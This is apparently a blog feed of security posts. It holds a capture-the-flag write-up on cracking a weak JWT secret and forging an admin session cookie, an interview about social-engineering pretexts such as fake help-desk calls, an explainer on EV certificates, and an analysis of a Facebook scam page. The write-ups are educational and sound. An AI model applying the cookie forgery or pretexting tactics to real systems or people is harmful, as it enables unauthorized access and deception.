&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F64fsnt5s88jd64wshmvc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F64fsnt5s88jd64wshmvc.png" alt="error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I used the 'Inspect' feature of Google Chrome to look at the source code. &lt;br&gt;
There's a JavaScript file called 'custom.js' and inside of it I could see the handling for the login form and also a registration form that seems to be hidden and can only be accessed by the admin. Hmm... This was my brick wall. So everything beyond this point is largely based on guidance I received from the amazing security community I'm a part of in my city, &lt;a href="https://secdsm.org/" rel="noopener noreferrer"&gt;SecDSM&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;
  
  
  Telnet
&lt;/h3&gt;

&lt;p&gt;Telnet is a command line tool that can be used to manually communicate with a server over a specified port. For example, if you want to send an HTTP GET request manually or specially craft one yourself, you can use telnet to do that.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET /home.html HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 54
Set-Cookie: bsides_augusta_2017=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTIwIDE2OjI0OjIwLjUyMjY0NSIsInVzZXIiOiJndWVzdCJ9.akXnslG9494KsLHyRf6pJBlCAVgmZSNBMwOE38jCF2s
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 20 Jul 2017 16:24:20 GMT

&amp;lt;html&amp;gt;&amp;lt;script&amp;gt;window.location.href='/'&amp;lt;/script&amp;gt;&amp;lt;/html&amp;gt;Connection closed by foreign host.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The response from the server gave me a lot of information. I saw that the server is setting a cookie called bsides_augusta_2017, and the value looks like dot-separated base64-encoded strings. &lt;br&gt;
&lt;code&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9&lt;/code&gt; decodes to &lt;code&gt;{"alg":"HS256","typ":"JWT"}&lt;/code&gt;&lt;br&gt;
&lt;code&gt;eyJpc3N1ZWQiOiIyMDE3LTA3LTIwIDE2OjI0OjIwLjUyMjY0NSIsInVzZXIiOiJndWVzdCJ9&lt;/code&gt; decodes to &lt;code&gt;{"issued":"2017-07-20 16:24:20.522645","user":"guest"}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;From this I knew the signing algorithm and the token type, as well as what user we're showing up as: guest. &lt;/p&gt;
&lt;h3&gt;
  
  
  If You Give A Site A Cookie...
&lt;/h3&gt;

&lt;p&gt;We need to find a way to forge a cookie that tells the server we're the admin. This is achieved in four steps. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Get the Session Cookie With a GET&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2091
Set-Cookie: bsides_augusta_2017=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJndWVzdCJ9.WtsckOvZlwBNlE4vJuvA9sK0LAZ0zQ47161ogfrZ1Vw
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 27 Jul 2017 02:11:05 GMT
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2: Get The Secret Key&lt;/strong&gt;&lt;br&gt;
This site uses &lt;a href="https://jwt.io/introduction/" rel="noopener noreferrer"&gt;JSON Web Tokens&lt;/a&gt;. JWTs are signed using a secret key, so I needed to find out what that is in order to forge the cookie. &lt;a href="https://github.com/brendan-rius/c-jwt-cracker" rel="noopener noreferrer"&gt;Brendan Rius' JWT Cracker&lt;/a&gt; is what I used to get the key in a matter of seconds.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;~/c-jwt-cracker$ ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJndWVzdCJ9.WtsckOvZlwBNlE4vJuvA9sK0LAZ0zQ47161ogfrZ1Vw

Secret is "l3et"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 3: Edit the Cookie&lt;/strong&gt;&lt;br&gt;
To edit the cookie, I used &lt;a href="https://www.jsonwebtoken.io/" rel="noopener noreferrer"&gt;jsonwebtoken.io&lt;/a&gt; with the secret I uncovered using &lt;code&gt;jwtcrack&lt;/code&gt;. &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fvfxt33lroj892dru3lg1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fvfxt33lroj892dru3lg1.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Insert The New Value For Your Cookie&lt;/strong&gt;&lt;br&gt;
There are multiple ways to do this. I have a plugin on my Chrome Browser called Edit This Cookie that allows me to edit the value of a cookie directly. I used this after verifying that the value was correct with telnet.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ telnet 35.184.14.24 80
Trying 35.184.14.24...
Connected to 24.14.184.35.bc.googleusercontent.com.
Escape character is '^]'.
GET /home.html HTTP/1.1
Host: 35.184.14.24
Cookie: bsides_augusta_2017=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3N1ZWQiOiIyMDE3LTA3LTI3IDAyOjExOjA1LjEwMjYzMCIsInVzZXIiOiJhZG1pbiIsImp0aSI6IjI1NzU0OGIxLTU4MDctNDZiNi05ZDBmLTBkY2FiNzYyM2Y0NSIsImlhdCI6MTUwMTEyMTU2MCwiZXhwIjoxNTAxMTI1MTYwfQ.mHrODuQhBBVcC954lkquc5xOVNZI0fwMuIVNjKD0EAY

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2974
Server: Werkzeug/0.12.2 Python/2.7.12
Date: Thu, 27 Jul 2017 02:13:41 GMT

...
...
...
&amp;lt;!-- Created by Christopher Davis. https://www.linkedin.com/in/christopher-davis-4817b392/ --&amp;gt;
...
...
...                        
                    &amp;lt;h3&amp;gt;&amp;amp;nbsp&amp;amp;nbspChallenge Success!&amp;lt;/h3&amp;gt;
                    &amp;lt;p&amp;gt;Good job on solving the challenge and being the #11 player to solve the challenge! As one of the first 5 players, you will receive a prize at Bsides August 2017.&amp;lt;/br&amp;gt;Simply Provide your details below and someone will contact you.&amp;lt;/br&amp;gt; Please do NOT register unless you are attending Bsides Augusta on Sep 16 2017. Tickets can be bought &amp;lt;a href="https://www.eventbrite.com/e/bsidesaugusta-2017-tickets-35553549624?ref=ecount"&amp;gt;here&amp;lt;/a&amp;gt;.&amp;lt;/p&amp;gt;
...
...
...
Connection closed by foreign host.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F9oz9m5ckfgaklwkrqggt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F9oz9m5ckfgaklwkrqggt.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Success&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F48gsqfxr5k339zy1wq8m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F48gsqfxr5k339zy1wq8m.png"&gt;&lt;/a&gt;&lt;br&gt;
Welp, that's all folks. Replace #11 with #3 and you've got exactly what I saw.&lt;/p&gt;

&lt;p&gt;&lt;iframe class="tweet-embed" id="tweet-888075099613605889-128" src="https://platform.twitter.com/embed/Tweet.html?id=888075099613605889"&gt;
&lt;/iframe&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;A few of the other guys from SecDSM also started working on this challenge after I asked for help. One of them used BurpSuite to forward the forged cookie to the server (just in case you were curious about alternative ways). I'm not well versed in BurpSuite, but I have a feeling it'll be handy for future challenges involving web vulnerabilities.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Another one of the guys is the one who found jwtcracker and the token forgery site. I asked him later how he knew to look for these. He said he didn't recognize the webserver used (as seen in the HTTP response from the telnet commands: &lt;code&gt;Server: Werkzeug/0.12.2 Python/2.7.12&lt;/code&gt;) and Googled session handling for it. I did the same and you're eventually directed toward JSON Web Tokens. The lesson here is to take the time to pay attention to everything.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;This challenge was far more difficult than I initially thought, but it was also extremely beneficial. I've never had to forge a cookie and now I know how and now you do too. Give it a shot. &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;BSides Augusta is September 16th in Augusta, Georgia. Get more information on their &lt;a href="http://www.securitybsides.com/w/page/113886499/BSidesAugusta%202017" rel="noopener noreferrer"&gt;website&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Did You Know There Are Different Types of Certs for HTTPS?</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Mon, 24 Jul 2017 20:43:17 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/did-you-know-there-are-different-types-of-certs-for-https</link>
      <guid>https://dev.to/antoinette0x53/did-you-know-there-are-different-types-of-certs-for-https</guid>
      <description>&lt;p&gt;Can you tell the difference between the two images below (beyond the fact that they're different websites)? &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fgqj8ccp4o6o1jfxvj9kw.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fgqj8ccp4o6o1jfxvj9kw.PNG"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F6cs6x8nh3kb96ma6b9m2.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F6cs6x8nh3kb96ma6b9m2.PNG"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Do you see where Twitter has 'Twitter, Inc [US]' next to the green padlock and Google only has 'Secure'? That means Twitter is using an EV or Extended Validation certificate, whereas Google is only using a DV or Domain Validation certificate. I had only vaguely noticed that certain HTTPS sites have wording other than 'Secure' next to the green padlock, and it wasn't until I read Troy Hunt's blog, &lt;em&gt;&lt;a href="https://www.troyhunt.com/on-the-perceived-value-ev-certs-cas-phishing-lets-encrypt/" rel="noopener noreferrer"&gt;On The (Perceived) Value of EV Certs, Commercial CAs, Phishing and Let's Encrypt&lt;/a&gt;&lt;/em&gt;, that I knew what that meant. &lt;/p&gt;

&lt;p&gt;I won't rehash everything he said because he covered everything really well. You should read it if you have the time. However, there's a quote from his blog post that sums everything up perfectly.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Whilst DV certs give us assurance that we're communicating with the domain we think we are, it's EV certs which give us confidence we're communicating with the organisation we think we are." &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Domain Validation certificates require the certificate requester to prove that they control the domain they're acquiring the certificate for, which isn't difficult to do. The purpose of an EV cert is to provide an extra layer of confidence. Someone could easily acquire a DV cert for a phishing site, but an EV certificate requires proof that they are the organization they're claiming to be. In fact, a human auditor has to perform an independent review of the requester before an EV cert can be issued. I cannot just buy a domain, run a PayPal phishing site, and acquire an EV cert that says I'm PayPal.&lt;/p&gt;

&lt;p&gt;What does this mean to you? Maybe nothing. It was mentioned that we, security professionals, should begin to change the way we condition our users, so that instead of inherently trusting the green padlock, we train users to recognize the difference between EV and DV certificates and change behaviors based on that. That isn't necessarily feasible at the moment, since many top 100 Alexa sites forgo EV certs (e.g. Google). But it is possible to begin to pay attention when we see an EV cert for an HTTPS site and change behaviors when we no longer see that cert. &lt;/p&gt;

&lt;p&gt;For example, Bank of America has an EV cert and I've always subconsciously known that because it was the first time I wondered why the organization name was next to the green padlock. If that were to suddenly change one day, I'd immediately become suspicious. &lt;/p&gt;

&lt;p&gt;So, will you begin to look out for these two types of certs now? Did you know about EV and DV certs before or is this your first time hearing about it too?&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>You'd Probably Willingly Tell This Woman Your Password</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Tue, 27 Jun 2017 20:22:25 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/youd-probably-willingly-tell-this-woman-your-password</link>
      <guid>https://dev.to/antoinette0x53/youd-probably-willingly-tell-this-woman-your-password</guid>
      <description>

&lt;p&gt;Last weekend I traveled to Minneapolis for &lt;a href="http://brrcon.com/"&gt;BrrCon&lt;/a&gt; and &lt;a href="https://www.bsidesmsp.org/"&gt;BSidesMSP&lt;/a&gt;, two security conferences happening back-to-back. During BrrCon, I attended a talk called 'Social Engineers are Jerks. Equipping Your Staff to Deal With Them and Get You in the Loop.' presented by Jen Fox. &lt;a href="http://brrcon.com/social-engineers-are-jerks/"&gt;Find out more about the talk here.&lt;/a&gt; Jen's was far and away my favorite talk at BrrCon. She talked about how she can use social engineering to extract information from people. She uses her talents as a consultant for different companies. Following her talk, I sat down with Jen for an interview. I edited a few of her responses for readability below. At the very end, I posted a similar talk that she did at a different conference from 2015.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Some Context&lt;/strong&gt; During her presentation, Jen played a few calls. One of them involved a young woman who knew that something suspicious was going on because she'd been asked for her password over the phone and asked Jen a bunch of questions about who she was and even looked her up in the system. After not finding Jen in the system she asked if she could return Jen's call later. Even though the woman was clearly stressed out, she passed the social engineering test. Others were not so successful. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  In your own words, what is 'social engineering'?
&lt;/h3&gt;

&lt;p&gt;I think the typical definition of social engineering really is that you're attempting to influence somebody to do something or take some action that may or may not be in their best interest. That's actually from &lt;a href="https://www.amazon.com/Social-Engineering-Art-Human-Hacking/dp/0470639539"&gt;Chris Hadnagy's book&lt;/a&gt; about social engineering and it's a definition I agree with.&lt;/p&gt;

&lt;h3&gt;
  
  
  How did you get into social engineering?
&lt;/h3&gt;

&lt;p&gt;Actually, my husband. He wanted to do the social engineering capture the flag at &lt;a href="https://www.defcon.org/"&gt;DEFCON&lt;/a&gt; in Las Vegas. They were trying to get both men and women to do the competition and you had a better chance of getting in as a guy if you had a woman also submit. I thought the idea was kind of horrifying because for that competition you're on a stage in a booth making phone calls in front of a packed room and everybody hears both sides of the phone call. Which is amazing to watch, terrifying to do. I don't even like making phone calls of any kind; I don't even like ordering pizza. So I was not extremely excited about the idea, but I really loved doing all of the research and I loved the challenge. We all had to submit flags or pieces of information we had to find for the competition. So I enjoyed doing that research and coming up with the pretext of the story I was going to use. What's going to be plausible? What would make sense? What do I need to do to get what I want? I loved that.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: If you aren't sure what DEFCON is, I'd like to point out that it is a big deal that Jen won their Social Engineering competition. The &lt;a href="https://www.defcon.org/html/links/dc-black-badge.html#tab-1"&gt;DEFCON black badge&lt;/a&gt; is highly coveted. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  It sounds like you have a natural talent for it. How long ago was that?
&lt;/h3&gt;

&lt;p&gt;Four years ago I did my first competition. And the third year I won. &lt;/p&gt;

&lt;h3&gt;
  
  
  What's your go-to tactic?
&lt;/h3&gt;

&lt;p&gt;The fake help desk call is one I do very consistently. If a company has not been getting social engineering assessments that should be the low bar, that people can resist a fake help desk call. I love the calls with the portals too. They're not complicated to do and they're hard to defend against. They're a common attack and no one is saying 'what's your password'. You just go to a website and log in with your credentials. &lt;/p&gt;

&lt;h3&gt;
  
  
  How do you stay in character during a call or situation that isn't going your way?
&lt;/h3&gt;

&lt;p&gt;I always really strive to fail gracefully. What I don't want to do is just hang up mid-call. Like the one we heard, when she started peppering me with questions, if I had just hung up because I was getting intimidated, that would absolutely be a flag. And that's the last thing I want; I don't want anybody being more suspicious than they need to be or they're inclined to be. I always try very hard even when somebody says 'no' and they're really shooting me down, I just do what you heard in the example with 'That's okay, I'll just put you on a list for follow up then.' and I end the call and get out. &lt;/p&gt;

&lt;p&gt;Also, for pretext I do a lot of preparation. For the fake help desk call that you heard, I script that because that's not the area of IT that I came from, so it's not like I just naturally know it. I just do my research, and through LinkedIn most of the time you can figure out what version of Windows they have; that's really not hard. Then I write a script, I might write a couple. I also do a lot of research surrounding who I say I am and what department. If I'm claiming to be from somewhere, who do I say is my supervisor? If I'm claiming to be a third party consultant, who do I say is my champion within the organization? I've done that, and you heard me dropping somebody, Kirsten, and everybody went 'Oooh. Okay. Yeah, that makes sense.' Some people don't resist at all and some do. Partly I'm always torn between rooting for them or getting my way. But I want them to do well because I want what's best for my client. It's hard when you can tell somebody is very stressed and you can tell they're struggling. It's hard in person too because you know, there's no question about it, 'I am causing the person to be very uncomfortable', which is the last thing 'regular' me is about. &lt;/p&gt;

&lt;h3&gt;
  
  
  What type of employees do you usually seek as targets? Call centers? Or people with a specific access?
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;h2&gt;
  
  
  All information is interesting to somebody.
&lt;/h2&gt;
&lt;/blockquote&gt;

&lt;p&gt;It depends on the engagement. Sometimes the client really wants certain areas of the company or has certain types of information they're concerned about. If they don't have anybody in particular in mind, I look at the kind of organization. What do they do? What are they likely to have? What's interesting? What's the most interesting thing about them and who has access? That can be a variety of departments. In IT, you have all of those admin privileges and a lot of elevated access to information in IT. The finance department, if they have one, is pretty interesting. Also, people who have access to a lot of customer data, or maybe they have a lot of employees so HR might be interesting. All information is interesting to somebody. That's often a discussion I have with clients as well; people take information they have access to for granted. [They'll say] 'well, it's not a bank account number', but that doesn't mean it's not worth anything.&lt;/p&gt;

&lt;h3&gt;
  
  
  Would it be feasible for a social engineer to go after someone who is internal facing, or doesn't normally have interactions over their office phone? Such as a developer? How do you get to someone if they don't really do 'phone'?
&lt;/h3&gt;

&lt;p&gt;That's a good question. One of the challenges as a social engineer is just getting someone to answer the phone. You can spend a lot of time calling and calling and calling. It can be a long and tedious process. If there was a department I was really focused on, it would depend on the rules of engagement. Not all clients want all the things. Sometimes they only want phishing, or they're interested in having someone physically on site. In which case I have a different opportunity, [like seeing] if I can get into an area to plug something in, and I've done that before. And it's one of those things where I go "oh gosh, it shouldn't be this easy", but at a place that's big enough, it's easy. Other departments don't really pay attention to IT. It can be pretty plausible if you're at a large enough place.&lt;/p&gt;

&lt;h3&gt;
  
  
  What did you do before you became a consultant?
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;h2&gt;
  
  
  I want people to have a good experience with technology because, at work, we don't really have a choice.
&lt;/h2&gt;
&lt;/blockquote&gt;

&lt;p&gt;I started off my degree with professional technical writing. I got my first job in technical writing and wrote manuals for software. From writing to training, because no one wants to talk to the users. From training, I saw a lot of shortcomings in how the software design process had come about. I'd talk to the users about what they do so that I could train them in a meaningful way and would know that the software doesn't do that. I was interested in how I could get to the part of the process to influence that. How does software get better? So then I became a usability analyst and then a high tech anthropologist. That was about focusing on the user; again, people and process. From there I did other business analysis. Then security started looking interesting and I got a graduate certificate in all the things. People and process have always been my thread. That's what has always mattered. I want people to have a good experience with technology because, at work, we don't really have a choice. It's not optional to use the systems we use. I really want things to work for people and work better for people. And even more so with all of the things on our phones and our apps, I don't want to see people post pictures of their drivers' licenses.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can the average person 'resist' better?
&lt;/h3&gt;

&lt;p&gt;I've been thinking about it a lot and 'what are some of the common elements of it'. A lot of thought around 'where are my boundaries?'. Saying 'no' to anything can be hard and very difficult for a lot of people. I think you have to understand where your boundaries are and know what's the line between 'okay' and 'not okay' and have a script for it. I'm an introvert, so for me, I'm much better off. I already kind of know what I'm going to do, which is why I script my calls. But I think it's like if you're talking to a young kid who is having trouble with someone at school. It's kind of the same thing, you coach them and say 'if he does that again, do this or say this'. That instills a great measure of confidence if you know you just have a way to shut it down without causing a scene or being rude. Those are two things that some people are 100% okay with, but so many people aren't. People can tell and that's where we get you. So having a couple of scripts to say 'I'm sorry, we don't share that information with people', it just kind of sends the message and shuts it down. It's easy to repeat and people will move on.&lt;/p&gt;

&lt;h2&gt;
  
  
  Watch Jen's Circle City Con Talk
&lt;/h2&gt;

&lt;p&gt;I don't have the video from her BrrCon talk, but check out Jen at Circle City Con 2015.&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/atlj86P9Zf8"&gt; &lt;/iframe&gt;&lt;/p&gt;


</description>
      <category>socialengineering</category>
      <category>security</category>
    </item>
    <item>
      <title>I Clicked On A Facebook Scam To See What Would Happen</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Mon, 05 Jun 2017 17:31:32 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/i-clicked-on-a-facebook-scam-to-see-what-would-happen</link>
      <guid>https://dev.to/antoinette0x53/i-clicked-on-a-facebook-scam-to-see-what-would-happen</guid>
      <description>&lt;p&gt;So, I'm scrolling through Facebook and suddenly... &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fy2eeiu70uu3jxyycwu9u.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fy2eeiu70uu3jxyycwu9u.jpg"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then I'm like...&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Frb8mwv6qgin53gg9ps55.JPG" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Frb8mwv6qgin53gg9ps55.JPG"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Do you see what's immediately wrong here? To start, Delta Airlines isn't going to give out two free tickets to anyone for its 33rd anniversary.&lt;/p&gt;

&lt;p&gt;Next, look at that URL at the bottom of the image.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fk2brlva0903v3kf7u91r.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fk2brlva0903v3kf7u91r.jpg"&gt;&lt;/a&gt;&lt;br&gt;
Sure, it's possible for Delta to own different websites. But if Delta Airlines were going to give out free tickets for anything, it's safe to say it's for the purposes of marketing, meaning they would more than likely want to drive traffic directly to their main website located at Delta.com. &lt;/p&gt;
&lt;h1&gt;
  
  
  The Surface
&lt;/h1&gt;

&lt;p&gt;Now I'm curious, so I pull up Wireshark and start sniffing my own traffic while I browse through the site.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;It should be noted that I should have done this in a VM. It is very possible that it could have been a drive by malware attack, meaning my computer would have been infected as soon as I visited the site...aaaand later you'll see why this matters. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fecvvd6g4xm2hqtu74x2r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fecvvd6g4xm2hqtu74x2r.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Immediately I see that this site isn't secure (no HTTPS). I clicked through the questions, and reached a page that urged me to share the link on Facebook, Like a page (I never did find out what Page it wanted me to Like), and then I would somehow get the tickets. Since there was no way I was going to Share the link, this was my stopping point.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;I looked up whether or not it would be possible to trick the site into thinking the link was shared, but I didn't see any hacky javascript to check that. It would have to be something hacky because you can't really track whether or not a user shared a Facebook post without having the user authenticate to your site using Facebook. (Correct me if I'm wrong here. I'm not an expert on Facebook's Share tracking)&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;At the bottom of the page, there were Facebook comments from "users" confirming that they had received tickets. This is a common method scammers use in an attempt to legitimize their site.&lt;/p&gt;
&lt;h1&gt;
  
  
  A Peek Under The Hood
&lt;/h1&gt;

&lt;p&gt;I took a minute to look through the source code for the site, and the first thing I noticed was that everything was hard-coded, even the so-called Facebook comments. The "user" images came from a site called randomuser.me, a.k.a. stock photos. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fjyzfch1w7ozjp0hnspre.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fjyzfch1w7ozjp0hnspre.jpg"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I know it's a little hard to see (feel free to zoom in), but these are all hard-coded comments found on the page.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fcpnsz1n41rfvrv93x4b5.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fcpnsz1n41rfvrv93x4b5.PNG" alt="facebook-comments"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And here is a closer look. You can see where they hard-coded the number of likes the comments have, along with the age of the comments.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;div id="fb1" class="item hidden"&amp;gt;
    &amp;lt;img class="profileimg" src="https://randomuser.me/api/portraits/women/53.jpg" /&amp;gt;
